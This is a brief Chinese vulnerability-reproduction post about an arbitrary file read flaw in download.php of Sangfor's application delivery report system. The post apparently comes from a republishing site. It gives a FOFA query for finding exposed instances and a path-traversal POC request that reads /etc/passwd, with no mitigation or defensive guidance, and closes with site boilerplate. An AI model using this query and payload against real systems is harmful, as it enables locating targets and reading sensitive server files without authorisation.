1.深信服应用交付报表任意文件读取漏洞
1.1.漏洞描述
深信服应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件。
1.2.漏洞影响
深信服应用交付报表系统
1.3.FOFA
app=“SANGFOR-应用交付报表系统”
2.漏洞复现
2.1.登录页面
2.2.POC
这里通过抓包进行文件读取,当然也可以在页面中直接进行获取。文章来源:https://www.toymoban.com/news/detail-684684.html
POC:/report/download.php?pdf=../../../../../etc/passwd
文章来源地址https://www.toymoban.com/news/detail-684684.html
到了这里,关于深信服应用交付报表任意文件读取漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!